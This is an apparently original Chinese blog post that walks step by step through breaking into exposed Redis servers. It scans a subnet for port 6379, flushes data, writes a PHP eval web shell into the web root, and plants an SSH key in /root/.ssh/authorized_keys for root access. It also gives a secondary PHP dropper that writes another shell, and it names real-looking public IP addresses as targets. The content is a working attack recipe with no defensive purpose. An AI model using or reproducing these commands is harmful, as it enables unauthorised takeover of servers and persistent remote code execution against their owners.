A-A+
redis写webshell redis

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
nmap --script=redis-info -p6379 192.168.1.0/24 --open
redis写webshell 刷新并进入redis控制台
修改默认目录和文件名(需要web的绝对路径)
|
ssh-keygen -t rsa -C "gdd@gdd.gd"
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
redis-cli -h redis-cli -h 119.254.72.27 flushall
echo -e "\n\n <?php @eval($_POST[cmd]);?> \n\n"|redis-cli -h 61.155.167.220 -p 6379 -x set %
redis-cli config set dir /var/www/html
redis-cli config set dbfilename index1.php
redis-cli save
cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
redis-cli -h 192.168.1.11
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
ssh -i id_rsa root@192.168.1.11 最后建议用 http://winscp.net/eng/docs/lang:chs 它管理ssh连接。 RedisDesktopManager图形管理工具 WinSCP SSH图形管理工具 这里还可以二次写shell。
<?php
$fp
=
fopen
(
'wtf.php'
,
'w'
);
fwrite(
$fp
,
'<?php @eval($_POST[\"cmd\"]);?>'
);
?>
个人觉得利用
<?php file_put_contents("./
wtf.php
", "<?php @eval($_POST[\"cmd\"]);?>
\r\n", FILE_APPEND); ?>更好一些。
如果出现如下错误:
(error) MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please check Redis logs for details about the error.
请使用config set stop-writes-on-bgsave-error no命令来解决
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏